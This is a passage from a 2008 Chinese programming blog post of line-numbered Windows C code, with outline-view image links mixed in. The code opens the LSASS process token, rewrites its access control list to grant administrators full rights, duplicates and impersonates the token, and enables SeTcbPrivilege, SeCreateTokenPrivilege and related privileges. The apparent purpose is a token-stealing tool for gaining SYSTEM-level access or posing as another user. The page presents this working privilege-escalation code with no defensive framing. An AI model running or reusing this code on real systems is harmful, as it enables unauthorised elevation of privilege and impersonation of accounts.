1165
return -1;
1166
}
1167
//再opentoken
1168
if(!OpenProcessToken(LsassHandle,STANDARD_RIGHTS_READ|WRITE_DAC,&LsassToken))
1169![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1170
printf("OpenProcessToken First Error:%d\n",GetLastError());
1171
CloseHandle(LsassHandle);
1172
return -1;
1173
}
1174
//得到Token的ACL信息
1175
//pSecurityDescriptor = NULL;
1176
//size = 0;
1177
//len = 0;
1178
//先申请内存
1179
if(!AddUserPrivToHandle(LsassToken,"administrators",TOKEN_ALL_ACCESS))
1180![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1181
CloseHandle(LsassToken);
1182
CloseHandle(LsassHandle);
1183
return -1;
1184
}
1185
//关闭句柄
1186
CloseHandle(LsassToken);
1187![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1188
//打开Token
1189
if(!OpenProcessToken(LsassHandle,TOKEN_ALL_ACCESS,&LsassToken))
1190![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1191
printf("OpenProcessToken LsassHandle Error:%d\n",GetLastError());
1192
CloseHandle(LsassHandle);
1193
return -1;
1194
}
1195
//关闭句柄
1196
CloseHandle(LsassHandle);
1197
//复制Token
1198
if(!DuplicateTokenEx(LsassToken,TOKEN_ALL_ACCESS,NULL,SecurityImpersonation,TokenPrimary,&NewToken))
1199![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1200
printf("DuplicateTokenEx Error:%d\n",GetLastError());
1201
return -1;
1202
}
1203
//CloseHandle(LsassToken);
1204
if(!ImpersonateLoggedOnUser(NewToken))
1205![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1206
printf("ImpersonateLoggedOnUser Error:%d\n",GetLastError());
1207
CloseHandle(NewToken);
1208
return -1;
1209
}
1210
GrantPriv("SeCreateTokenPrivilege");
1211
GrantPriv("SeTcbPrivilege");
1212
GrantPriv("SeIncreaseQuotaPrivilege");
1213
GrantPriv("SeAssignPrimaryTokenPrivilege");
1214
//CloseHandle(NewToken);
1215
return 0;
1216
// GetKernelObjectSecurity(Handle,DACL_SECURITY_INFORMATION,buf,size,&len)
1217
// GetSecurityDescriptorDacl(buf,&lpbDaclPresent,PoldACL,&lpbDaclDefaulted);
1218
// BuildExplicitAccessWithName(pstruct,"administrators",TOKEN_ALL_ACCESS,GRANT_ACCESS,NO_INHERITANCE)
1219
// SetEntriesInAcl(1,pstruct,PoldACL,PnewACL); //合并权限
1220
// MakeAbsoluteSD(buf,buf2,
1221
// SetSecurityDescriptorDacl(buf2,lpbDaclPresent,PnewACL,lpbDaclDefaulted);
1222
// SetKernelObjectSecurity(HANDLE,DACL_SECURITY_INFORMATION,buf2,);
1223
// CloseHandle(HANDLE);
1224
// DuplicateTokenEx(LsassToken,TOKEN_ALL_ACCESS,NULL,SecurityImpersonation,TokenPrimary,&NewToken);
1225
// CloseHandle(LsassToken);
1226
// ImpersonateLoggedOnUser
1227
}
1228
//帮助信息
1229
void usage(char *s)
1230![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1231
printf("Usage:%s <-u user>\n",s);
1232
return;
1233
}
1234![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1235
BOOL ConvertSidToStringSid(PSID pSid,LPTSTR TextualSid, LPDWORD lpdwBufferLen)
1236![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1237
PSID_IDENTIFIER_AUTHORITY psia;
1238
DWORD dwSubAuthorities;
1239
DWORD dwSidRev=SID_REVISION;
1240
DWORD dwCounter;
1241
DWORD dwSidSize;
1242![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1243
// Validate the binary SID.
1244
if(!IsValidSid(pSid)) return FALSE;
1245
// Get the identifier authority value from the SID.
1246
psia = GetSidIdentifierAuthority(pSid);
1247
// Get the number of subauthorities in the SID.
1248
dwSubAuthorities = *GetSidSubAuthorityCount(pSid);
1249
// Compute the buffer length.
1250
// S-SID_REVISION- + IdentifierAuthority- + subauthorities- + NULL
1251
dwSidSize=(15 + 12 + (12 * dwSubAuthorities) + 1) * sizeof(TCHAR);
1252
// Check input buffer length.
1253
// If too small, indicate the proper size and set last error.
1254
if (*lpdwBufferLen < dwSidSize)
1255![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1256
*lpdwBufferLen = dwSidSize;
1257
SetLastError(ERROR_INSUFFICIENT_BUFFER);
1258
return FALSE;
1259
}
1260![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1261
// Add 'S' prefix and revision number to the string.
1262
dwSidSize=wsprintf(TextualSid, TEXT("S-%lu-"), dwSidRev );
1263
// Add SID identifier authority to the string.
1264
if ( (psia->Value[0] != 0) || (psia->Value[1] != 0) )
1265![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1266
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
1267
(USHORT)psia->Value[0],
1268
(USHORT)psia->Value[1],
1269
(USHORT)psia->Value[2],
1270
(USHORT)psia->Value[3],
1271
(USHORT)psia->Value[4],
1272
(USHORT)psia->Value[5]);
1273
}
1274
else
1275![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1276
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),TEXT("%lu"),
1277
(ULONG)(psia->Value[5] ) +
1278
(ULONG)(psia->Value[4] << 8) +
1279
(ULONG)(psia->Value[3] << 16) +
1280
(ULONG)(psia->Value[2] << 24) );
1281
}
1282![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1283
// Add SID subauthorities to the string.
1284
for (dwCounter=0 ; dwCounter < dwSubAuthorities ; dwCounter++)
1285![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1286
dwSidSize+=wsprintf(TextualSid + dwSidSize, TEXT("-%lu"),
1287
*GetSidSubAuthority(pSid, dwCounter) );
1288
}
1289
return TRUE;
1290
}
1291![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1292
void *GetFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS tic)
1293![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1294
DWORD n,n2,rv;
1295
void *p;
1296![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1297
n2 = 0;
1298
rv = GetTokenInformation(hToken,tic,NULL,n2, &n);
1299
if (rv == FALSE && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
1300![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1301
printf("GetTokenInformation Failed:%d\n",GetLastError());
1302
return NULL;
1303
}
1304![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1305
p = malloc(n+1);
1306
if(p == NULL)
1307![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1308
printf("Malloc in GetFromToken Failed\n");
1309
return NULL;
1310
}
1311
n2 = n;
1312
if(!GetTokenInformation(hToken, tic, p, n2, &n) )
1313![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1314
printf("GetTokenInformation After Malloc Failed:%d\n",GetLastError());
1315
return NULL;
1316
}
1317
return p;
1318
}
1319![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1320
void pfree(void *p)
1321![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1322
if(p)
1323
free(p);
1324
}
1325![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1326
LUID GetLuidFromText(char *s)
1327![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1328
LUID Luid;
1329![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1330
Luid.LowPart = 0;
1331
Luid.HighPart = 0;
1332
if(!LookupPrivilegeValue(NULL,s,&Luid))
1333![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1334
printf("LookupPrivilegeValue under GetLuidFromText(\"%s\") Failed:%d\n",s,GetLastError());
1335
return Luid;
1336
}
1337
return Luid;
1338
}
1339![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
posted @
2008-09-04 14:20
ahuo
阅读(
1440)
评论()
编辑
收藏
举报